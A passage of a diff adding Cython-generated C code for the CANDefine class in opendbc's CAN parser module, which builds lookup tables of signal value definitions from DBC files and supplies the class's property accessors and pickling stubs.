val.name.decode("utf8") + * def_val = val.def_val.decode("utf8") # <<<<<<<<<<<<<< + * address = val.address + * msgname = address_to_msg_name[address] + */ + __pyx_t_3 = __Pyx_decode_cpp_string(__pyx_v_val.def_val, 0, PY_SSIZE_T_MAX, NULL, NULL, PyUnicode_DecodeUTF8); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 171, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_XDECREF_SET(__pyx_v_def_val, __pyx_t_3); + __pyx_t_3 = 0; + + /* "opendbc/can/parser_pyx.pyx":172 + * sgname = val.name.decode("utf8") + * def_val = val.def_val.decode("utf8") + * address = val.address # <<<<<<<<<<<<<< + * msgname = address_to_msg_name[address] + * + */ + __pyx_t_10 = __pyx_v_val.address; + __pyx_v_address = __pyx_t_10; + + /* "opendbc/can/parser_pyx.pyx":173 + * def_val = val.def_val.decode("utf8") + * address = val.address + * msgname = address_to_msg_name[address] # <<<<<<<<<<<<<< + * + * # separate definition/value pairs + */ + __pyx_t_3 = __Pyx_PyInt_From_uint32_t(__pyx_v_address); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 173, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_6 = __Pyx_PyDict_GetItem(__pyx_v_address_to_msg_name, __pyx_t_3); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 173, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __Pyx_XDECREF_SET(__pyx_v_msgname, __pyx_t_6); + __pyx_t_6 = 0; + + /* "opendbc/can/parser_pyx.pyx":176 + * + * # separate definition/value pairs + * def_val = def_val.split() # <<<<<<<<<<<<<< + * values = [int(v) for v in def_val[::2]] + * defs = def_val[1::2] + */ + __pyx_t_3 = __Pyx_PyObject_GetAttrStr(__pyx_v_def_val, __pyx_n_s_split); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 176, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_11 = NULL; + __pyx_t_12 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_3))) { + __pyx_t_11 = PyMethod_GET_SELF(__pyx_t_3); + if (likely(__pyx_t_11)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_3); + __Pyx_INCREF(__pyx_t_11); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_3, function); + __pyx_t_12 = 1; + } + } + { + PyObject *__pyx_callargs[1] = {__pyx_t_11, }; + __pyx_t_6 = __Pyx_PyObject_FastCall(__pyx_t_3, __pyx_callargs+1-__pyx_t_12, 0+__pyx_t_12); + __Pyx_XDECREF(__pyx_t_11); __pyx_t_11 = 0; + if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 176, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + } + __Pyx_DECREF_SET(__pyx_v_def_val, __pyx_t_6); + __pyx_t_6 = 0; + + /* "opendbc/can/parser_pyx.pyx":177 + * # separate definition/value pairs + * def_val = def_val.split() + * values = [int(v) for v in def_val[::2]] # <<<<<<<<<<<<<< + * defs = def_val[1::2] + * + */ + { /* enter inner scope */ + __pyx_t_6 = PyList_New(0); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 177, __pyx_L10_error) + __Pyx_GOTREF(__pyx_t_6); + __pyx_t_3 = __Pyx_PyObject_GetItem(__pyx_v_def_val, __pyx_slice__5); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 177, __pyx_L10_error) + __Pyx_GOTREF(__pyx_t_3); + if (likely(PyList_CheckExact(__pyx_t_3)) || PyTuple_CheckExact(__pyx_t_3)) { + __pyx_t_11 = __pyx_t_3; __Pyx_INCREF(__pyx_t_11); __pyx_t_4 = 0; + __pyx_t_15 = NULL; + } else { + __pyx_t_4 = -1; __pyx_t_11 = PyObject_GetIter(__pyx_t_3); if (unlikely(!__pyx_t_11)) __PYX_ERR(0, 177, __pyx_L10_error) + __Pyx_GOTREF(__pyx_t_11); + __pyx_t_15 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_11); if (unlikely(!__pyx_t_15)) __PYX_ERR(0, 177, __pyx_L10_error) + } + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + for (;;) { + if (likely(!__pyx_t_15)) { + if (likely(PyList_CheckExact(__pyx_t_11))) { + if (__pyx_t_4 >= PyList_GET_SIZE(__pyx_t_11)) break; + #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + __pyx_t_3 = PyList_GET_ITEM(__pyx_t_11, __pyx_t_4); __Pyx_INCREF(__pyx_t_3); __pyx_t_4++; if (unlikely((0 < 0))) __PYX_ERR(0, 177, __pyx_L10_error) + #else + __pyx_t_3 = PySequence_ITEM(__pyx_t_11, __pyx_t_4); __pyx_t_4++; if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 177, __pyx_L10_error) + __Pyx_GOTREF(__pyx_t_3); + #endif + } else { + if (__pyx_t_4 >= PyTuple_GET_SIZE(__pyx_t_11)) break; + #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + __pyx_t_3 = PyTuple_GET_ITEM(__pyx_t_11, __pyx_t_4); __Pyx_INCREF(__pyx_t_3); __pyx_t_4++; if (unlikely((0 < 0))) __PYX_ERR(0, 177, __pyx_L10_error) + #else + __pyx_t_3 = PySequence_ITEM(__pyx_t_11, __pyx_t_4); __pyx_t_4++; if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 177, __pyx_L10_error) + __Pyx_GOTREF(__pyx_t_3); + #endif + } + } else { + __pyx_t_3 = __pyx_t_15(__pyx_t_11); + if (unlikely(!__pyx_t_3)) { + PyObject* exc_type = PyErr_Occurred(); + if (exc_type) { + if (likely(__Pyx_PyErr_GivenExceptionMatches(exc_type, PyExc_StopIteration))) PyErr_Clear(); + else __PYX_ERR(0, 177, __pyx_L10_error) + } + break; + } + __Pyx_GOTREF(__pyx_t_3); + } + __Pyx_XDECREF_SET(__pyx_8genexpr4__pyx_v_v, __pyx_t_3); + __pyx_t_3 = 0; + __pyx_t_3 = __Pyx_PyNumber_Int(__pyx_8genexpr4__pyx_v_v); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 177, __pyx_L10_error) + __Pyx_GOTREF(__pyx_t_3); + if (unlikely(__Pyx_ListComp_Append(__pyx_t_6, (PyObject*)__pyx_t_3))) __PYX_ERR(0, 177, __pyx_L10_error) + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + } + __Pyx_DECREF(__pyx_t_11); __pyx_t_11 = 0; + __Pyx_XDECREF(__pyx_8genexpr4__pyx_v_v); __pyx_8genexpr4__pyx_v_v = 0; + goto __pyx_L14_exit_scope; + __pyx_L10_error:; + __Pyx_XDECREF(__pyx_8genexpr4__pyx_v_v); __pyx_8genexpr4__pyx_v_v = 0; + goto __pyx_L1_error; + __pyx_L14_exit_scope:; + } /* exit inner scope */ + __Pyx_XDECREF_SET(__pyx_v_values, ((PyObject*)__pyx_t_6)); + __pyx_t_6 = 0; + + /* "opendbc/can/parser_pyx.pyx":178 + * def_val = def_val.split() + * values = [int(v) for v in def_val[::2]] + * defs = def_val[1::2] # <<<<<<<<<<<<<< + * + * # two ways to lookup: address or msg name + */ + __pyx_t_6 = __Pyx_PyObject_GetItem(__pyx_v_def_val, __pyx_slice__6); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 178, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + __Pyx_XDECREF_SET(__pyx_v_defs, __pyx_t_6); + __pyx_t_6 = 0; + + /* "opendbc/can/parser_pyx.pyx":181 + * + * # two ways to lookup: address or msg name + * dv[address][sgname] = dict(zip(values, defs)) # <<<<<<<<<<<<<< + * dv[msgname][sgname] = dv[address][sgname] + * + */ + __pyx_t_6 = PyTuple_New(2); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 181, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + __Pyx_INCREF(__pyx_v_values); + __Pyx_GIVEREF(__pyx_v_values); + PyTuple_SET_ITEM(__pyx_t_6, 0, __pyx_v_values); + __Pyx_INCREF(__pyx_v_defs); + __Pyx_GIVEREF(__pyx_v_defs); + PyTuple_SET_ITEM(__pyx_t_6, 1, __pyx_v_defs); + __pyx_t_11 = __Pyx_PyObject_Call(__pyx_builtin_zip, __pyx_t_6, NULL); if (unlikely(!__pyx_t_11)) __PYX_ERR(0, 181, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_11); + __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; + __pyx_t_6 = __Pyx_PyObject_CallOneArg(((PyObject *)(&PyDict_Type)), __pyx_t_11); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 181, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + __Pyx_DECREF(__pyx_t_11); __pyx_t_11 = 0; + __pyx_t_11 = __Pyx_GetItemInt(__pyx_v_dv, __pyx_v_address, uint32_t, 0, __Pyx_PyInt_From_uint32_t, 0, 0, 1); if (unlikely(!__pyx_t_11)) __PYX_ERR(0, 181, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_11); + if (unlikely((PyObject_SetItem(__pyx_t_11, __pyx_v_sgname, __pyx_t_6) < 0))) __PYX_ERR(0, 181, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_11); __pyx_t_11 = 0; + __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; + + /* "opendbc/can/parser_pyx.pyx":182 + * # two ways to lookup: address or msg name + * dv[address][sgname] = dict(zip(values, defs)) + * dv[msgname][sgname] = dv[address][sgname] # <<<<<<<<<<<<<< + * + * self.dv = dict(dv) + */ + __pyx_t_6 = __Pyx_GetItemInt(__pyx_v_dv, __pyx_v_address, uint32_t, 0, __Pyx_PyInt_From_uint32_t, 0, 0, 1); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 182, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + __pyx_t_11 = __Pyx_PyObject_GetItem(__pyx_t_6, __pyx_v_sgname); if (unlikely(!__pyx_t_11)) __PYX_ERR(0, 182, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_11); + __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; + __pyx_t_6 = __Pyx_PyObject_GetItem(__pyx_v_dv, __pyx_v_msgname); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 182, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + if (unlikely((PyObject_SetItem(__pyx_t_6, __pyx_v_sgname, __pyx_t_11) < 0))) __PYX_ERR(0, 182, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; + __Pyx_DECREF(__pyx_t_11); __pyx_t_11 = 0; + } + + /* "opendbc/can/parser_pyx.pyx":184 + * dv[msgname][sgname] = dv[address][sgname] + * + * self.dv = dict(dv) # <<<<<<<<<<<<<< + */ + __pyx_t_11 = __Pyx_PyObject_CallOneArg(((PyObject *)(&PyDict_Type)), __pyx_v_dv); if (unlikely(!__pyx_t_11)) __PYX_ERR(0, 184, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_11); + __Pyx_GIVEREF(__pyx_t_11); + __Pyx_GOTREF(__pyx_v_self->dv); + __Pyx_DECREF(__pyx_v_self->dv); + __pyx_v_self->dv = ((PyObject*)__pyx_t_11); + __pyx_t_11 = 0; + + /* "opendbc/can/parser_pyx.pyx":151 + * string dbc_name + * + * def __init__(self, dbc_name): # <<<<<<<<<<<<<< + * self.dbc_name = dbc_name + * self.dbc = dbc_lookup(dbc_name) + */ + + /* function exit code */ + __pyx_r = 0; + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_3); + __Pyx_XDECREF(__pyx_t_6); + __Pyx_XDECREF(__pyx_t_11); + __Pyx_AddTraceback("opendbc.can.parser_pyx.CANDefine.__init__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = -1; + __pyx_L0:; + __Pyx_XDECREF(__pyx_v_address_to_msg_name); + __Pyx_XDECREF(__pyx_v_name); + __Pyx_XDECREF(__pyx_v_dv); + __Pyx_XDECREF(__pyx_v_sgname); + __Pyx_XDECREF(__pyx_v_def_val); + __Pyx_XDECREF(__pyx_v_msgname); + __Pyx_XDECREF(__pyx_v_values); + __Pyx_XDECREF(__pyx_v_defs); + __Pyx_XDECREF(__pyx_8genexpr4__pyx_v_v); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "opendbc/can/parser_pyx.pyx":148 + * + * cdef public: + * dict dv # <<<<<<<<<<<<<< + * string dbc_name + * + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_7opendbc_3can_10parser_pyx_9CANDefine_2dv_1__get__(PyObject *__pyx_v_self); /*proto*/ +static PyObject *__pyx_pw_7opendbc_3can_10parser_pyx_9CANDefine_2dv_1__get__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__get__ (wrapper)", 0); + __pyx_r = __pyx_pf_7opendbc_3can_10parser_pyx_9CANDefine_2dv___get__(((struct __pyx_obj_7opendbc_3can_10parser_pyx_CANDefine *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_7opendbc_3can_10parser_pyx_9CANDefine_2dv___get__(struct __pyx_obj_7opendbc_3can_10parser_pyx_CANDefine *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__get__", 0); + __Pyx_XDECREF(__pyx_r); + __Pyx_INCREF(__pyx_v_self->dv); + __pyx_r = __pyx_v_self->dv; + goto __pyx_L0; + + /* function exit code */ + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* Python wrapper */ +static int __pyx_pw_7opendbc_3can_10parser_pyx_9CANDefine_2dv_3__set__(PyObject *__pyx_v_self, PyObject *__pyx_v_value); /*proto*/ +static int __pyx_pw_7opendbc_3can_10parser_pyx_9CANDefine_2dv_3__set__(PyObject *__pyx_v_self, PyObject *__pyx_v_value) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + int __pyx_r; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__set__ (wrapper)", 0); + __pyx_r = __pyx_pf_7opendbc_3can_10parser_pyx_9CANDefine_2dv_2__set__(((struct __pyx_obj_7opendbc_3can_10parser_pyx_CANDefine *)__pyx_v_self), ((PyObject *)__pyx_v_value)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static int __pyx_pf_7opendbc_3can_10parser_pyx_9CANDefine_2dv_2__set__(struct __pyx_obj_7opendbc_3can_10parser_pyx_CANDefine *__pyx_v_self, PyObject *__pyx_v_value) { + int __pyx_r; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__set__", 0); + if (!(likely(PyDict_CheckExact(__pyx_v_value))||((__pyx_v_value) == Py_None) || __Pyx_RaiseUnexpectedTypeError("dict", __pyx_v_value))) __PYX_ERR(0, 148, __pyx_L1_error) + __pyx_t_1 = __pyx_v_value; + __Pyx_INCREF(__pyx_t_1); + __Pyx_GIVEREF(__pyx_t_1); + __Pyx_GOTREF(__pyx_v_self->dv); + __Pyx_DECREF(__pyx_v_self->dv); + __pyx_v_self->dv = ((PyObject*)__pyx_t_1); + __pyx_t_1 = 0; + + /* function exit code */ + __pyx_r = 0; + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("opendbc.can.parser_pyx.CANDefine.dv.__set__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = -1; + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* Python wrapper */ +static int __pyx_pw_7opendbc_3can_10parser_pyx_9CANDefine_2dv_5__del__(PyObject *__pyx_v_self); /*proto*/ +static int __pyx_pw_7opendbc_3can_10parser_pyx_9CANDefine_2dv_5__del__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + int __pyx_r; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__del__ (wrapper)", 0); + __pyx_r = __pyx_pf_7opendbc_3can_10parser_pyx_9CANDefine_2dv_4__del__(((struct __pyx_obj_7opendbc_3can_10parser_pyx_CANDefine *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static int __pyx_pf_7opendbc_3can_10parser_pyx_9CANDefine_2dv_4__del__(struct __pyx_obj_7opendbc_3can_10parser_pyx_CANDefine *__pyx_v_self) { + int __pyx_r; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__del__", 0); + __Pyx_INCREF(Py_None); + __Pyx_GIVEREF(Py_None); + __Pyx_GOTREF(__pyx_v_self->dv); + __Pyx_DECREF(__pyx_v_self->dv); + __pyx_v_self->dv = ((PyObject*)Py_None); + + /* function exit code */ + __pyx_r = 0; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "opendbc/can/parser_pyx.pyx":149 + * cdef public: + * dict dv + * string dbc_name # <<<<<<<<<<<<<< + * + * def __init__(self, dbc_name): + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_7opendbc_3can_10parser_pyx_9CANDefine_8dbc_name_1__get__(PyObject *__pyx_v_self); /*proto*/ +static PyObject *__pyx_pw_7opendbc_3can_10parser_pyx_9CANDefine_8dbc_name_1__get__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__get__ (wrapper)", 0); + __pyx_r = __pyx_pf_7opendbc_3can_10parser_pyx_9CANDefine_8dbc_name___get__(((struct __pyx_obj_7opendbc_3can_10parser_pyx_CANDefine *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_7opendbc_3can_10parser_pyx_9CANDefine_8dbc_name___get__(struct __pyx_obj_7opendbc_3can_10parser_pyx_CANDefine *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__get__", 0); + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __pyx_convert_PyBytes_string_to_py_std__in_string(__pyx_v_self->dbc_name); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 149, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("opendbc.can.parser_pyx.CANDefine.dbc_name.__get__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* Python wrapper */ +static int __pyx_pw_7opendbc_3can_10parser_pyx_9CANDefine_8dbc_name_3__set__(PyObject *__pyx_v_self, PyObject *__pyx_v_value); /*proto*/ +static int __pyx_pw_7opendbc_3can_10parser_pyx_9CANDefine_8dbc_name_3__set__(PyObject *__pyx_v_self, PyObject *__pyx_v_value) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + int __pyx_r; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__set__ (wrapper)", 0); + __pyx_r = __pyx_pf_7opendbc_3can_10parser_pyx_9CANDefine_8dbc_name_2__set__(((struct __pyx_obj_7opendbc_3can_10parser_pyx_CANDefine *)__pyx_v_self), ((PyObject *)__pyx_v_value)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static int __pyx_pf_7opendbc_3can_10parser_pyx_9CANDefine_8dbc_name_2__set__(struct __pyx_obj_7opendbc_3can_10parser_pyx_CANDefine *__pyx_v_self, PyObject *__pyx_v_value) { + int __pyx_r; + __Pyx_RefNannyDeclarations + std::string __pyx_t_1; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__set__", 0); + __pyx_t_1 = __pyx_convert_string_from_py_std__in_string(__pyx_v_value); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 149, __pyx_L1_error) + __pyx_v_self->dbc_name = __PYX_STD_MOVE_IF_SUPPORTED(__pyx_t_1); + + /* function exit code */ + __pyx_r = 0; + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_AddTraceback("opendbc.can.parser_pyx.CANDefine.dbc_name.__set__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = -1; + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "(tree fragment)":1 + * def __reduce_cython__(self): # <<<<<<<<<<<<<< + * raise TypeError, "self.dbc cannot be converted to a Python object for pickling" + * def __setstate_cython__(self, __pyx_state): + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_7opendbc_3can_10parser_pyx_9CANDefine_3__reduce_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_7opendbc_3can_10parser_pyx_9CANDefine_3__reduce_cython__ = {"__reduce_cython__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_7opendbc_3can_10parser_pyx_9CANDefine_3__reduce_cython__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_7opendbc_3can_10parser_pyx_9CANDefine_3__reduce_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__reduce_cython__ (wrapper)", 0); + if (unlikely(__pyx_nargs > 0)) { + __Pyx_RaiseArgtupleInvalid("__reduce_cython__", 1, 0, 0, __pyx_nargs); return NULL;} + if (unlikely(__pyx_kwds) && __Pyx_NumKwargs_FASTCALL(__pyx_kwds) && unlikely(!__Pyx_CheckKeywordStrings(__pyx_kwds, "__reduce_cython__", 0))) return NULL; + __pyx_r = __pyx_pf_7opendbc_3can_10parser_pyx_9CANDefine_2__reduce_cython__(((struct __pyx_obj_7opendbc_3can_10parser_pyx_CANDefine *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_7opendbc_3can_10parser_pyx_9CANDefine_2__reduce_cython__(CYTHON_UNUSED struct __pyx_obj_7opendbc_3can_10parser_pyx_CANDefine *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__reduce_cython__", 0); + + /* "(tree fragment)":2 + * def __reduce_cython__(self): + * raise TypeError, "self.dbc cannot be converted to a Python object for pickling" # <<<<<<<<<<<<<< + * def __setstate_cython__(self, __pyx_state): + * raise TypeError, "self.dbc cannot be converted to a Python object for pickling" + */ + __Pyx_Raise(__pyx_builtin_TypeError, __pyx_kp_s_self_dbc_cannot_be_converted_to, 0, 0); + __PYX_ERR(1, 2, __pyx_L1_error) + + /* "(tree fragment)":1 + * def __reduce_cython__(self): # <<<<<<<<<<<<<< + * raise TypeError, "self.dbc cannot be converted to a Python object for pickling" + * def __setstate_cython__(self, __pyx_state): + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_AddTraceback("opendbc.can.parser_pyx.CANDefine.__reduce_cython__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "(tree fragment)":3 + * def __reduce_cython__(self): + * raise TypeError, "self.dbc cannot be converted to a Python object for pickling" + * def __setstate_cython__(self, __pyx_state): # <<<<<<<<<<<<<< + * raise TypeError, "self.dbc cannot be converted to a Python object for pickling" + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_7opendbc_3can_10parser_pyx_9CANDefine_5__setstate_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_7opendbc_3can_10parser_pyx_9CANDefine_5__setstate_cython__ = {"__setstate_cython__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_7opendbc_3can_10parser_pyx_9CANDefine_5__setstate_cython__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_7opendbc_3can_10parser_pyx_9CANDefine_5__setstate_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + CYTHON_UNUSED PyObject *__pyx_v___pyx_state = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__setstate_cython__ (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_pyx_state,0}; + PyObject* values[1] = {0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pyx_state)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 3, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "__setstate_cython__") < 0)) __PYX_ERR(1, 3, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 1)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + } + __pyx_v___pyx_state = values[0]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("__setstate_cython__", 1, 1, 1, __pyx_nargs); __PYX_ERR(1, 3, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("opendbc.can.parser_pyx.CANDefine.__setstate_cython__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_7opendbc_3can_10parser_pyx_9CANDefine_4__setstate_cython__(((struct __pyx_obj_7opendbc_3can_10parser_pyx_CANDefine *)__pyx_v_self), __pyx_v___pyx_state); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_7opendbc_3can_10parser_pyx_9CANDefine_4__setstate_cython__(CYTHON_UNUSED struct __pyx_obj_7opendbc_3can_10parser_pyx_CANDefine *__pyx_v_self, CYTHON_UNUSED PyObject *__pyx_v___pyx_state) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__setstate_cython__", 0); + + /* "(tree fragment)":4 + * raise 